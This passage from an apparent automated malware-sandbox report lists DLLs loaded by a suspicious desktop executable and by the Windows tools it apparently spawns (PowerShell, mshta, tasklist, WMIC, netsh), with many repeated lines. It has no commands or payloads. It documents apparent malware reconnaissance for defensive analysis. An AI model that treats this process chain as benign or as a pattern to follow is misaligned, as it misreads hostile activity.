              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: midimap.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
